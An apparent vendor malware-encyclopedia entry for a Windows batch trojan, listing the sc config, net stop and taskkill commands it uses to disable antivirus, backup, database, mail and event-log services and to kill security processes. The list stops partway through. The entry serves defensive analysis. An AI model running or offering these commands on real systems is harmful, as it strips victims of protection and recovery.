Trojan.BAT.STARTER.TIAOOAAZ
Platform: Windows

Malware type: Trojan
Destructive: No
Encrypted: No
In the wild: Yes
Overview
This malware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It disables services related to security products. This allows the malware to carry out its malicious routines without being removed from the affected computer.
Details
Arrival Details
This malware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This malware adds the following processes:
- Disable the following anti-virus and anti-malware related services:
- sc config aswBcc start= disabled
- sc config bedbg start= disabled
- sc config ccEvtMgr start= disabled
- sc config ccSetMgr start= disabled
- sc config EhttpSrv start= disabled
- sc config ekrn start= disabled
- sc config EPIntegrationService start= disable
- sc config EPProtectedService start= disable
- sc config epredline start= disable
- sc config EPUpdateServicestart= disabled
- sc config EPUpdateService start= disabled
- sc config EPUpdateService start= disable
- sc config ESHASRV start= disabled
- sc config macmnsvc start= disabled
- sc config masvc start= disabled
- sc config McTaskManager start= disabled
- sc config mfefire start= disabled
- sc config mfevtp start= disabled
- sc config mfewc start= disabled
- sc config ntrtscan start= disabled
- sc config SAVService start= disabled
- sc config SepMasterService start= disabled
- sc config SepMasterServiceMig start= disabled
- sc config Smcinst start= disabled
- sc config SntpService start= disabled
- sc config svcGenericHost start= disabled
- sc config swi_filter start= disabled
- sc config swi_service start= disabled
- sc config swi_update start= disabled
- sc config swi_update_64 start= disabled
- sc config Symantec start= disabled
- sc config "Symantec System Recovery" start= disabled
- sc config TmCCSF start= disabled
- sc config TmPfw start= disable
- sc config TrueKeyScheduler start= disabled
- sc config TrueKeyServiceHelper start= disabled
- sc config WdNisSvc start= disabled
- Disable other services:
- sc config "Acronis VSS Provider" start= disabled
- sc config AcronisAgent start= disabled
- sc config AcrSch2Svc start= disabled
- sc config AdobeARMservice start= disabled
- sc config Alerter start= disabled
- sc config ARSM start= disabled
- sc config avbackup start= disabled
- sc config BackupExecAgentAccelerator start= disabled
- sc config BackupExecAgentBrowser start= disabled
- sc config BackupExecDeviceMediaService start= disabled
- sc config BackupExecJobEngine start= disabled
- sc config BackupExecManagementService start= disabled
- sc config BackupExecRPCService start= disabled
- sc config BackupExecVSSProvider start= disabled
- sc config bcrservice start= disabled
- sc config BITSstart= disabled
- sc config BlueStripeCollector start= disabled
- sc config BrokerInfrastructurestart= disabled
- sc config Cissesrv start= disabled
- sc config CpqRcmc3 start= disabled
- sc config CSAdmin start= disabled
- sc config CSAuth start= disabled
- sc config CSDbSync start= disabled
- sc config CSLog start= disabled
- sc config CSMon start= disabled
- sc config CSRadius start= disabled
- sc config CSTacacs start= disabled
- sc config DB2 start= disabled
- sc config DB2-0 start= disabled
- sc config DB2DAS00 start= disabled
- sc config DB2GOVERNOR_DB2COPY1 start= disabled
- sc config DB2INST2 start= disabled
- sc config DB2LICD_DB2COPY1 start= disabled
- sc config DB2MGMTSVC_DB2COPY1 start= disabled
- sc config DB2REMOTECMD_DB2COPY1 start= disabled
- sc config DCAgent start= disabled
- sc config "Enterprise Client Service" start= disabled
- sc config epag start= disable
- sc config EPSecurityServicestart= disabled
- sc config EPSecurityService start= disabled
- sc config EPSecurityService start= disable
- sc config EraserSvc11710 start= disabled
- sc config ERSvc start= disabled
- sc config EsgShKernel start= disabled
- sc config Eventlog start= disabled
- sc config FA_Scheduler start= disabled
- sc config GoogleChromeElevationService start= disabled
- sc config gupdate start= disabled
- sc config gupdatem start= disabled
- sc config HealthService start= disabled
- sc config IBMDataServerMgr start= disabled
- sc config IBMDSServer41 start= disabled
- sc config IDriverT start= disabled
- sc config IISAdmin start= disabled
- sc config IMAP4Svc start= disabled
- sc config ImapiService start= disabled
- sc config klnagent start= disabled
- sc config LogProcessorService start= disabled
- sc config LRSDRVX start= disabled
- sc config MBAMService start= disabled
- sc config MBEndpointAgent start= disabled
- sc config McShield start= disabled
- sc config mfemms start= disabled
- sc config MMS start= disabled
- sc config mozyprobackup start= disabled
- sc config MsDtsServer start= disabled
- sc config MsDtsServer100 start= disabled
- sc config MsDtsServer110 start= disabled
- sc config MsDtsServer130 start= disabled
- sc config MSExchangeES start= disabled
- sc config MSExchangeIS start= disabled
- sc config MSExchangeMGMT start= disabled
- sc config MSExchangeMTA start= disabled
- sc config MSExchangeSA start= disabled
- sc config MSExchangeSRS start= disabled
- sc config msftesql$PROD start= disabled
- sc config MSMQ start= disabled
- sc config MSOLAP$SQL_2008 start= disabled
- sc config MSOLAP$SYSTEM_BGC start= disabled
- sc config MSOLAP$TPS start= disabled
- sc config MSOLAP$TPSAMA start= disabled
- sc config MSSQL$BKUPEXEC start= disabled
- sc config MSSQL$CITRIX_METAFRAME start= disabled
- sc config MSSQL$ECWDB2 start= disabled
- sc config MSSQL$EPOSERVER start= disabled
- sc config MSSQL$ITRIS start= disabled
- sc config MSSQL$NET2 start= disabled
- sc config MSSQL$PRACTICEMGT start= disabled
- sc config MSSQL$PRACTTICEBGC start= disabled
- sc config MSSQL$PROD start= disabled
- sc config MSSQL$PROFXENGAGEMENT start= disabled
- sc config MSSQL$SBSMONITORING start= disabled
- sc config MSSQL$SHAREPOINT start= disabled
- sc config MSSQL$SQL_2008 start= disabled
- sc config MSSQL$SQLEXPRESS start= disabled
- sc config MSSQL$SYSTEM_BGC start= disabled
- sc config MSSQL$TPS start= disabled
- sc config MSSQL$TPSAMA start= disabled
- sc config MSSQL$VEEAMSQL2008R2 start= disabled
- sc config MSSQL$VEEAMSQL2012 start= disabled
- sc config MSSQLFDLauncher start= disabled
- sc config MSSQLFDLauncher$ITRIS start= disabled
- sc config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
- sc config MSSQLFDLauncher$SBSMONITORING start= disabled
- sc config MSSQLFDLauncher$SHAREPOINT start= disabled
- sc config MSSQLFDLauncher$SQL_2008 start= disabled
- sc config MSSQLFDLauncher$SYSTEM_BGC start= disabled
- sc config MSSQLFDLauncher$TPS start= disabled
- sc config MSSQLFDLauncher$TPSAMA start= disabled
- sc config MSSQLLaunchpad$ITRIS start= disabled
- sc config MSSQLSERVER start= disabled
- sc config MSSQLServerADHelper start= disabled
- sc config MSSQLServerADHelper100 start= disabled
- sc config MSSQLServerOLAPService start= disabled
- sc config msvsmon90 start= disabled
- sc config MySQL57 start= disabled
- sc config Net2ClientSvc start= disabled
- sc config NetDDE start= disabled
- sc config NetMsmqActivator start= disabled
- sc config NetSvc start= disabled
- sc config NimbusWatcherService start= disabled
- sc config NtLmSsp start= disabled
- sc config NtmsSvc start= disabled
- sc config odserv start= disabled
- sc config OracleClientCache80 start= disabled
- sc config ose start= disabled
- sc config PDVFSService start= disabled
- sc config POP3Svc start= disabled
- sc config ProLiantMonitor start= disabled
- sc config ReportServer start= disabled
- sc config ReportServer$SQL_2008 start= disabled
- sc config ReportServer$SYSTEM_BGC start= disabled
- sc config ReportServer$TPS start= disabled
- sc config ReportServer$TPSAMA start= disabled
- sc config RESvc start= disabled
- sc config RSCDsvc start= disabled
- sc config sacsvr start= disabled
- sc config SamSs start= disabled
- sc config SDD_Service start= disabled
- sc config SDRSVC start= disabled
- sc config SentinelAgent start= disabled
- sc config SentinelHelperService start= disabled
- sc config SentinelStaticEngine start= disabled
- sc config ShMonitor start= disabled
- sc config SmcService start= disabled
- sc config SMTPSvc start= disabled
- sc config SNAC start= disabled
- sc config SnowInventoryClient start= disabled
- sc config "SQL Backups" start= disabled
- sc config SQLAgent$BKUPEXEC start= disabled
- sc config SQLAgent$CITRIX_METAFRAME start= disabled
- sc config SQLAgent$CXDB start= disabled
- sc config SQLAgent$ECWDB2 start= disabled
- sc config SQLAgent$EPOSERVER start= disabled
- sc config SQLAgent$ITRIS start= disabled
- sc config SQLAgent$NET2 start= disabled
- sc config SQLAgent$PRACTTICEBGC start= disabled
- sc config SQLAgent$PRACTTICEMGT start= disabled
- sc config SQLAgent$PROD start= disabled
- sc config SQLAgent$PROFXENGAGEMENT start= disabled
- sc config SQLAgent$SBSMONITORING start= disabled
- sc config SQLAgent$SHAREPOINT start= disabled
- sc config SQLAgent$SQL_2008 start= disabled
- sc config SQLAgent$SQLEXPRESS start= disabled
- sc config SQLAgent$SYSTEM_BGC start= disabled
- sc config SQLAgent$TPS start= disabled
- sc config SQLAgent$TPSAMA start= disabled
- sc config SQLAgent$VEEAMSQL2008R2 start= disabled
- sc config SQLAgent$VEEAMSQL2012 start= disabled
- sc config SQLBrowser start= disabled
- sc config "SQLsafe Backup Service" start= disabled
- sc config "SQLsafe Filter Service" start= disabled
- sc config SQLSafeOLRService start= disabled
- sc config SQLSERVERAGENT start= disabled
- sc config SQLTELEMETRY start= disabled
- sc config SQLTELEMETRY$ECWDB2 start= disabled
- sc config SQLTELEMETRY$ITRIS start= disabled
- sc config SQLWriter start= disabled
- sc config SSISTELEMETRY130 start= disabled
- sc config SstpSvc start= disabled
- sc config sysdown start= disabled
- sc config System start= disabled
- sc config Telemetryserver start= disabled
- sc config TlntSvr start= disabled
- sc config tmlisten start= disabled
- sc config tpautoconnsvc start= disabled
- sc config TPAutoConnSvc start= disabled
- sc config TPVCGateway start= disabled
- sc config TrueKey start= disabled
- sc config TSM start= disabled
- sc config UI0Detect start= disabled
- sc config "Veeam Backup Catalog Data Service" start= disabled
- sc config VeeamBackupSvc start= disabled
- sc config VeeamBrokerSvc start= disabled
- sc config VeeamCatalogSvc start= disabled
- sc config VeeamCloudSvc start= disabled
- sc config VeeamDeploymentService start= disabled
- sc config VeeamDeploySvc start= disabled
- sc config VeeamEnterpriseManagerSvc start= disabled
- sc config VeeamHvIntegrationSvc start= disabled
- sc config VeeamMountSvc start= disabled
- sc config VeeamNFSSvc start= disabled
- sc config VeeamRESTSvc start= disabled
- sc config VeeamTransportSvc start= disabled
- sc config VGAuthService start= disabled
- sc config VMTools start= disabled
- sc config VMware start= disabled
- sc config VMwareCAFCommAmqpListener start= disabled
- sc config VMwareCAFManagementAgentHost start= disabled
- sc config vmware-converter-agent start= disabled
- sc config vmware-converter-server start= disabled
- sc config vmware-converter-worker start= disabled
- sc config W3Svc start= disabled
- sc config wbengine start= disabled
- sc config WebClient start= disabled
- sc config WinDefend start= disabled
- sc config WinVNC4 start= disabled
- sc config WRSVC start= disabled
- sc config "Zoolz 2 Service" start= disabled
- Terminate services:
- net stop "Acronis VSS Provider" /y
- net stop AcrSch2Svc /y
- net stop AdobeARMservice /y
- net stop Alerter /y
- net stop ARSM /y
- net stop avbackup /y
- net stop BackupExecAgentAccelerator /y
- net stop BackupExecAgentBrowser /y
- net stop BackupExecDeviceMediaService /y
- net stop BackupExecJobEngine /y
- net stop BackupExecManagementService /y
- net stop BackupExecVSSProvider /y
- net stop bcrservice /y
- net stop bedbg /y
- net stop BITS /y
- net stop BlueStripeCollector /y
- net stop BrokerInfrastructure /y
- net stop Cissesrv /y
- net stop CpqRcmc3 /y
- net stop CSAdmin /y
- net stop CSAuth /y
- net stop CSDbSync /y
- net stop CSLog /y
- net stop CSMon /y
- net stop CSRadius /y
- net stop CSTacacs /y
- net stop DB2 /y
- net stop DB2-0 /y
- net stop DB2DAS00 /y
- net stop DB2GOVERNOR_DB2COPY1 /y
- net stop DB2INST2 /y
- net stop DB2LICD_DB2COPY1 /y
- net stop DB2MGMTSVC_DB2COPY1 /y
- net stop DB2REMOTECMD_DB2COPY1 /y
- net stop DCAgent /y
- net stop "Enterprise Client Service" /y
- net stop epag /y
- net stop epredline /y
- net stop EraserSvc11710 /y
- net stop ERSvc /y
- net stop EsgShKernel /y
- net stop Eventlog /y
- net stop GoogleChromeElevationService /y
- net stop gupdate /y
- net stop gupdatem /y
- net stop HealthService /y
- net stop IBMDataServerMgr /y
- net stop IBMDSServer41 /y
- net stop IISAdmin /y
- net stop IMAP4Svc /y
- net stop ImapiService /y
- net stop LogProcessorService /y
- net stop LRSDRVX /y
- net stop MBEndpointAgent /y
- net stop McTaskManager /y
- net stop MMS /y
- net stop mozyprobackup /y
- net stop MsDtsServer /y
- net stop MsDtsServer100 /y
- net stop MsDtsServer110 /y
- net stop MsDtsServer130 /y
- net stop MSExchangeES /y
- net stop MSExchangeIS /y
- net stop MSExchangeMGMT /y
- net stop MSExchangeMTA /y
- net stop MSExchangeSA /y
- net stop MSExchangeSRS /y
- net stop msftesql$PROD /y
- net stop MSMQ /y
- net stop MSOLAP$SQL_2008 /y
- net stop MSOLAP$SYSTEM_BGC /y
- net stop MSOLAP$TPS /y
- net stop MSOLAP$TPSAMA /y
- net stop MSSQL$BKUPEXEC /y
- net stop MSSQL$CITRIX_METAFRAME /y
- net stop MSSQL$ECWDB2 /y
- net stop MSSQL$EPOSERVER /y
- net stop MSSQL$ITRIS /y
- net stop MSSQL$NET2 /y
- net stop MSSQL$PRACTICEMGT /y
- net stop MSSQL$PRACTTICEBGC /y
- net stop MSSQL$PROD /y
- net stop MSSQL$PROFXENGAGEMENT /y
- net stop MSSQL$SBSMONITORING /y
- net stop MSSQL$SHAREPOINT /y
- net stop MSSQL$SQL_2008 /y
- net stop MSSQL$SQLEXPRESS /y
- net stop MSSQL$SYSTEM_BGC /y
- net stop MSSQL$TPS /y
- net stop MSSQL$TPSAMA /y
- net stop MSSQL$VEEAMSQL2008R2 /y
- net stop MSSQL$VEEAMSQL2012 /y
- net stop MSSQLFDLauncher /y
- net stop MSSQLFDLauncher$ITRIS /y
- net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
- net stop MSSQLFDLauncher$SBSMONITORING /y
- net stop MSSQLFDLauncher$SHAREPOINT /y
- net stop MSSQLFDLauncher$SQL_2008 /y
- net stop MSSQLFDLauncher$SYSTEM_BGC /y
- net stop MSSQLFDLauncher$TPS /y
- net stop MSSQLFDLauncher$TPSAMA /y
- net stop MSSQLLaunchpad$ITRIS /y
- net stop MSSQLSERVER /y
- net stop MSSQLServerADHelper /y
- net stop MSSQLServerADHelper100 /y
- net stop MSSQLServerOLAPService /y
- net stop msvsmon90 /y
- net stop MySQL57 /y
- net stop Net2ClientSvc /y
- net stop NetDDE /y
- net stop NetMsmqActivator /y
- net stop NetSvc /y
- net stop NimbusWatcherService /y
- net stop NtLmSsp /y
- net stop NtmsSvc /y
- net stop odserv /y
- net stop OracleClientCache80 /y
- net stop ose /y
- net stop PDVFSService /y
- net stop POP3Svc /y
- net stop ProLiantMonitor /y
- net stop ReportServer /y
- net stop ReportServer$SQL_2008 /y
- net stop ReportServer$SYSTEM_BGC /y
- net stop ReportServer$TPS /y
- net stop ReportServer$TPSAMA /y
- net stop RESvc /y
- net stop RSCDsvc /y
- net stop sacsvr /y
- net stop SamSs /y
- net stop SAVService /y
- net stop SDD_Service /y
- net stop SDRSVC /y
- net stop SentinelAgent /y
- net stop SentinelHelperService /y
- net stop SentinelStaticEngine /y
- net stop ShMonitor /y
- net stop SmcService /y
- net stop SMTPSvc /y
- net stop SnowInventoryClient /y
- net stop "SQL Backups" /y
- net stop SQLAgent$BKUPEXEC /y
- net stop SQLAgent$CITRIX_METAFRAME /y
- net stop SQLAgent$CXDB /y
- net stop SQLAgent$ECWDB2 /y
- net stop SQLAgent$EPOSERVER /y
- net stop SQLAgent$ITRIS /y
- net stop SQLAgent$NET2 /y
- net stop SQLAgent$PRACTTICEBGC /y
- net stop SQLAgent$PRACTTICEMGT /y
- net stop SQLAgent$PROD /y
- net stop SQLAgent$PROFXENGAGEMENT /y
- net stop SQLAgent$SBSMONITORING /y
- net stop SQLAgent$SHAREPOINT /y
- net stop SQLAgent$SQL_2008 /y
- net stop SQLAgent$SQLEXPRESS /y
- net stop SQLAgent$SYSTEM_BGC /y
- net stop SQLAgent$TPS /y
- net stop SQLAgent$TPSAMA /y
- net stop SQLAgent$VEEAMSQL2008R2 /y
- net stop SQLAgent$VEEAMSQL2012 /y
- net stop SQLBrowser /y
- net stop "SQLsafe Backup Service" /y
- net stop "SQLsafe Filter Service" /y
- net stop SQLSafeOLRService /y
- net stop SQLSERVERAGENT /y
- net stop SQLTELEMETRY /y
- net stop SQLTELEMETRY$ECWDB2 /y
- net stop SQLTELEMETRY$ITRIS /y
- net stop SQLWriter /y
- net stop SSISTELEMETRY130 /y
- net stop SstpSvc /y
- net stop sysdown /y
- net stop System /y
- net stop Telemetryserver /y
- net stop TlntSvr /y
- net stop tpautoconnsvc /y
- net stop TPAutoConnSvc /y
- net stop TPVCGateway /y
- net stop TrueKey /y
- net stop TrueKeyScheduler /y
- net stop TrueKeyServiceHelper /y
- net stop TSM /y
- net stop UI0Detect /y
- net stop "Veeam Backup Catalog Data Service" /y
- net stop VeeamBackupSvc /y
- net stop VeeamBrokerSvc /y
- net stop VeeamCatalogSvc /y
- net stop VeeamCloudSvc /y
- net stop VeeamDeploymentService /y
- net stop VeeamDeploySvc /y
- net stop VeeamEnterpriseManagerSvc /y
- net stop VeeamHvIntegrationSvc /y
- net stop VeeamMountSvc /y
- net stop VeeamNFSSvc /y
- net stop VeeamRESTSvc /y
- net stop VeeamTransportSvc /y
- net stop VGAuthService /y
- net stop VMTools /y
- net stop VMware /y
- net stop VMwareCAFCommAmqpListener /y
- net stop VMwareCAFManagementAgentHost /y
- net stop vmware-converter-agent /y
- net stop vmware-converter-server /y
- net stop vmware-converter-worker /y
- net stop W3Svc /y
- net stop wbengine /y
- net stop WebClient /y
- net stop WinVNC4 /y
- net stop WRSVC /y
- net stop "Zoolz 2 Service" /y
- Terminate anti-virus and anti-malware related processes using taskkill /im {Process Name} /f, where {Process Name} can be any of the following:
- a2service.exe
- a2start.exe
- aawservice.exe
- acaas.exe
- acaegmgr.exe
- acaif.exe
- acais.exe
- acctmgr.exe
- ad-aware2007.exe
- administrator.exe
- adminserver.exe
- aflogvw.exe
- afwserv.exe
- ahnrpt.exe
- ahnsd.exe
- ahnsdsv.exe
- alert.exe
- alertsvc.exe
- almon.exe
- alogserv.exe
- alsvc.exe
- alunotify.exe
- alupdate.exe
- aluschedulersvc.exe
- amswmagt
- aphost.exe
- appsvc32.exe
- aps.exe
- apvxdwin.exe
- ashbug.exe
- ashchest.exe
- ashcmd.exe
- ashdisp.exe
- ashenhcd.exe
- ashlogv.exe
- ashmaisv.exe
- ashpopwz.exe
- ashquick.exe
- ashserv.exe
- ashsimp2.exe
- ashsimpl.exe
- ashskpcc.exe
- ashskpck.exe
- ashupd.exe
- ashwebsv.exe
- asupport.exe
- aswdisp.exe
- aswregsvr.exe
- aswserv.exe
- aswupdsv.exe
- aswwebsv.exe
- atwsctsk.exe
- aupdrun.exe
- aus.exe
- auth8021x.exe
- autoup.exe
- avcenter.exe
- avconfig.exe
- avconsol.exe
- avengine.exe
- avesvc.exe
- avfwsvc.exe
- avkproxy.exe
- avkservice.exe
- avktray.exe
- avkwctl.exe
- avltmain.exe
- avmailc.exe
- avmcdlg.exe
- avnotify.exe
- avscan.exe
- avserver.exe
- avshadow.exe
- avsynmgr.exe
- avtask.exe
- avwebgrd.exe
- bavtray.exe
- bdagent.exe
- bdc.exe
- bdlite.exe
- bdmcon.exe
- bdredline.exe
- bdss.exe
- bdsubmit.exe
- bhipssvc.exe
- bka.exe
- blackd.exe
- blackice.exe
- blupro.exe
- bmrt.exe
- bwgo0000
- ca.exe
- caantispyware.exe
- caav.exe
- caavcmdscan.exe
- caavguiscan.exe
- caf.exe
- cafw.exe
- caissdt.exe
- calogdump.exe
- capfaem.exe
- capfasem.exe
- capfsem.exe
- capmuamagt.exe
- cappactiveprotection.ex
- casc.exe
- casecuritycenter.exe
- caunst.exe
- cavrep.exe
- cavrid.exe
- cavscan.exe
- cavtray.exe
- ccap.exe
- ccapp.exe
- ccemflsv.exe
- ccenter.exe
- ccevtmgr.exe
- cclaw.exe
- ccnfagent.exe
- ccprovsp.exe
- ccproxy.exe
- ccpxysvc.exe
- ccschedulersvc.exe
- ccsetmgr.exe
- ccsmagtd.exe
- ccsvchst.exe
- ccsystemreport.exe
- cctray.exe
- ccupdate.exe
- certificationmanagerser
- cfftplugin.exe
- cfnotsrvd.exe
- cfp.exe
- cfpconfg.exe
- cfpconfig.exe
- cfplogvw.exe
- cfpsbmit.exe
- cfpupdat.exe
- cfsmsmd.exe
- checkup.exe
- cis.exe
- cistray.exe
- cka.exe
- clamscan.exe
- clamtray.exe
- clamwin.exe
- clps.exe
- clpsla.exe
- clpsls.exe
- clshield.exe
- cmdagent.exe
- cmdinstall.exe
- cmgrdian.exe
- cntaosmgr.exe
- comhost.exe
- console.exe
- coreframeworkhost.exe /
- coreserviceshell.exe
- cpd.exe
- cpdclnt.exe
- cpf.exe
- cpntsrv.exe
- cramtray.exe
- crashrep.exe
- crdm.exe
- crssvc.exe
- csacontrol.exe
- csadmin.exe
- csauth.exe
- csfalconservice.exe
- csinject.exe
- csinsm32.exe
- csinsmnt.exe
- cssauth.exe
- cylancesvc.exe
- cylanceui.exe
- dao_log.exe
- dbserv.exe
- dbsrv9.exe
- defwatch
- defwatch.exe
- deloeminfs.exe
- deteqt.agent.exe
- diskmon.exe
- djsnetcn.exe
- dlservice.exe
- doscan.exe
- dpmra.exe
- dr_serviceengine.exe
- drwagntd.exe
- drwagnui.exe
- drweb.exe
- drweb32.exe
- drweb32w.exe
- drweb386.exe
- drwebcgp.exe
- drwebcom.exe
- drwebdc.exe
- drwebmng.exe
- drwebscd.exe
- drwebupw.exe
- drwebwcl.exe
- drwebwin.exe
- drwinst.exe
- drwupgrade.exe
- dwarkdaemon.exe
- dwengine.exe
- dwhwizrd.exe
- dwnetfilter.exe
- dwwin.exe
- edisk.exe
- eeyeevnt.exe
- egui.exe
- ehttpsrv.exe
- ekrn.exe
- elogsvc.exe
- emlibupdateagentnt.exe
- emlproui.exe
- emlproxy.exe
- endpointsecurity.exe
- engineserver.exe
- entitymain.exe
- era.exe
- esecagntservice.exe
- esecservice.exe
- esmagent.exe
- etagent.exe
- etconsole3.exe
- etcorrel.exe
- etloganalyzer.exe
- etreporter.exe
- etrssfeeds.exe
- etscheduler.exe
- etwcontrolpanel.exe
- euqmonitor.exe
- eventparser.exe
- evtarmgr.exe
- evtmgr.exe
- evtprocessecfile.exe
- ewidoctrl.exe
- fameh32.exe
- fcappdb.exe
- fcdblog.exe
- fch32.exe
- fchelper64.exe
- fcsms.exe
- fcssas.exe
- fih32.exe
- firesvc.exe
- firetray.exe
- firewallgui.exe
- fmon.exe
- forcefield.exe
- fpavserver.exe
- fprottray.exe
- frameworkservic
- frameworkservic.exe
- frameworkservice.exe
- fsaa.exe
- fsaua.exe
- fsav32.exe
- fsavgui.exe
- fscuif.exe
- fsdfwd.exe
- fsgk32.exe
- fsgk32st.exe
- fsguidll.exe
- fsguiexe.exe
- fshdll32.exe
- fshoster32.exe
- fshoster64.exe
- fsm32.exe
- fsma32.exe
- fsmb32.exe
- fsorsp.exe
- fspc.exe
- fspex.exe
- fsqh.exe
- fssm32.exe
- fwcfg.exe
- fwinst.exe
- fws.exe
- gcascleaner.exe
- gcasdtserv.exe
- gcasinstallhelper.exe /
- gcasnotice.exe
- gcasserv.exe
- gcasservalert.exe
- gcasswupdater.exe
- gdfirewalltray.exe
- gdfwsvc.exe
- gdscan.exe
- gfireporterservice.exe
- ghost_2.exe
- ghosttray.exe
- giantantispywaremain.ex
- giantantispywareupdater
- gziface.exe
- gzserv.exe
- hwapi.exe
- icepack.exe
- idsinst.exe
- iface.exe
- igateway.exe
- inicio.exe
- inonmsrv.exe
- inorpc.exe
- inort.exe
- inotask.exe
- inoweb.exe
- isafe.exe
- isafinst.exe
- isntsmtp.exe
- isntsysmonitor
- ispwdsvc.exe
- isscsf.exe
- issdaemon.exe
- issvc.exe
- isuac.exe
- iswmgr.exe
- itmrt_supportdiagnostic
- itmrt_trace.exe
- itmrtsvc.exe
- ixaptsvc.exe
- ixavsvc.exe
- ixfwsvc.exe
- kabackreport.exe
- kaccore.exe
- kanmcmain.exe
- kansgui.exe
- kansvr.exe
- kis.exe
- kislive.exe
- kissvc.exe
- klnacserver.exe
- klnagent.exe
- klserver.exe
- klswd.exe
- klwtblfs.exe
- kmailmon.exe
- knownsvr.exe
- knupdatemain.exe
- kpf4gui.exe
- kpf4ss.exe
- kpfw32.exe
- kpfwsvc.exe
- krbcc32s.exe
- kswebshield.exe
- kvdetech.exe
- kvmonxp.kxp
- kvmonxp_2.kxp
- kvolself.exe
- kvsrvxp.exe
- kvsrvxp_1.exe
- kvxp.kxp
- kwatch.exe
- kwsprod.exe
- kxeserv.exe
- leventmgr.exe
- livesrv.exe
- lmon.exe
- log_qtine.exe
- loggingserver.exe
- luall.exe
- lucallbackproxy.exe
- lucoms.exe
- lucoms~1.exe
- lucomserver.exe
- lwdmserver.exe
- macmnsvc.exe
- macompatsvc.exe
- mantispm.exe
- masalert.exe
- massrv.exe
- masvc.exe
- mbamservice.exe
- mbamtray.exe
- mcagent.exe
- mcapexe.exe
- mcappins.exe
- mcconsol.exe
- mcdash.exe
- mcdetect.exe
- mcepoc.exe
- mcepocfg.exe
- mcinfo.exe
- mcmnhdlr.exe
- mcmscsvc.exe
- mcnasvc.exe
- mcods.exe
- mcpalmcfg.exe
- mcpromgr.exe
- mcproxy.exe
- mcregwiz.exe
- mcsacore.exe
- mcscript_inuse.exe
- mcshell.exe
- mcshield.exe
- mcshld9x.exe
- mcsvhost.exe
- mcsysmon.exe
- mctray.exe
- mctskshd.exe
- mcui32.exe
- mcuimgr.exe
- mcupdate.exe
- mcupdmgr.exe
- mcvsftsn.exe
- mcvsrte.exe
- mcvsshld.exe
- mcwce.exe
- mcwcecfg.exe
- mfeann.exe
- mfecanary.exe
- mfeesp.exe
- mfefire.exe
- mfefw.exe
- mfehcs.exe
- mfemactl.exe
- mfemms.exe
- mfetp.exe
- mfevtps.exe
- mfewc.exe
- mfewch.exe
- mgavrtcl.exe
- mghtml.exe
- mgntsvc.exe
- monsvcnt.exe
- monsysnt.exe
- mpcmdrun.exe
- mpf.exe
- mpfagent.exe
- mpfconsole.exe
- mpfservice.exe
- mpfsrv.exe
- mpftray.exe
- mps.exe
- mpsevh.exe
- mpsvc.exe
- mrf.exe
- msascui.exe
- mscifapp.exe
- mskagent.exe
- mskdetct.exe
- msksrver.exe
- msksrvr.exe
- msmpeng.exe
- msscli.exe
- msseces.exe
- msssrv.exe
- myagttry.exe
- nailgpip.exe
- naprdmgr.exe
- navectrl.exe
- navelog.exe
- navesp.exe
- navshcom.exe
- navw32.exe
- navwnt.exe
- ncdaemon.exe
- ndetect.exe
- neotrace.exe
- netcfg.exe
- networkagent.exe
- ngctw32.exe
- ngserver.exe
- nip.exe
- nipsvc.exe
- nisoptui.exe
- nisserv.exe
- nissrv.exe
- nisum.exe
- njeeves.exe
- nmain.exe
- nortonsecurity.exe
- npfmntor.exe
- npfmsg.exe
- npfmsg2.exe
- npfsvice.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nrmenctb.exe
- nscsrvce.exe
- nsctop.exe
- nsmdemf.exe
- nsmdmon.exe
- nsmdreal.exe
- nsmdsch.exe
- nsmdtr.exe
- ntrtscan.exe
- nvcoas.exe
- nvcsched.exe
- nymse.exe
- oasclnt.exe
- oespamtest.exe
- ofcdog.exe
- ofcpfwsvc.exe
- okclient.exe
- olfsnt40.exe
- onlinent.exe
- onlnsvc.exe
- op_viewer.exe
- opscan.exe
- outpost.exe
- padfsvr.exe
- pagent.exe
- pagentwd.exe
- pasystemtray.exe
- pavbckpt.exe
- pavfires.exe
- pavfnsvr.exe
- pavjobs.exe
- pavkre.exe
- pavmail.exe
- pavreport.exe
- pavsched.exe
- pavsrv50.exe
- pavsrv51.exe
- pavsrv52.exe
- pavupg.exe
- pccclient.exe
- pccguide.exe
- pcclient.exe
- pccnt.exe
- pccntmon.exe
- pccntupd.exe
- pccpfw.exe
- pcctlcom.exe
- pcscan.exe
- pcscnsrv.exe
- pctsauxs.exe
- pctsgui.exe
- pctssvc.exe
- pctstray.exe
- pep.exe
- persfw.exe
- pnmsrv.exe
- pntiomon.exe
- pop3pack.exe
- pop3trap.exe
- poproxy.exe
- ppclean.exe
- ppctlpriv.exe
- ppppwallrun.exe
- pqibrowser.exe
- pqv2isvc.exe
- prevsrv.exe
- privacyiconclient.exe
- proutil.exe
- psanhost.exe
- psctris.exe
- psctrls.exe
- psh_svc.exe
- pshost.exe
- psimreal.exe
- psimsvc.exe
- pskmssvc.exe
- psuamain.exe
- psuaservice.exe
- pxemtftp.exe
- pxeservice.exe
- qclean.exe
- qdcsfs.exe
- qoeloader.exe
- qserver.exe
- rapapp.exe
- ras.exe
- rasupd.exe
- rav.exe
- ravmon.exe
- ravmond.exe
- ravservice.exe
- ravstub.exe
- ravtask.exe
- ravtray.exe
- ravupdate.exe
- ravxp.exe
- rcsvcmon.exe
- redirsvc.exe
- regmech.exe
- remupd.exe
- reportersvc.exe
- reportsvc.exe
- retinaengine.exe
- rfwmain.exe
- rfwproxy.exe
- rfwsrv.exe
- rfwstub.exe
- rnav.exe
- rnreport.exe
- routernt.exe
- rpcserv.exe
- rsnetsvr.exe
- rstray.exe
- rtvscan.exe
- rulaunch.exe
- safeservice.exe
- sahookmain.exe
- saservice.exe
- sav32cli.exe
- savfmsectrl.exe
- savfmselog.exe
- savfmsesjm.exe
- savfmsesp.exe
- savfmsespamstatsmanager.exe
- savfmsesrv.exe
- savfmsetask.exe
- savfmseui.exe
- savmain.exe
- savroam.exe
- savscan.exe
- savservice.exe
- savui.exe
- sbserv.exe
- scan32.exe
- scanexplicit.exe
- scanfrm.exe
- scanmailoutlook.exe
- scanmsg.exe
- scanwscs.exe
- scfmanager.exe
- scfservice.exe
- scftray.exe
- schdsrvc.exe
- schupd.exe
- sdrservice.exe
- sdtrayapp.exe
- seccenter.exe
- securitycenter.exe
- semsvc.exe
- sesclu.exe
- setloadorder.exe
- setupguimngr.exe
- sevinst.exe
- sgbhp.exe
- shstat.exe
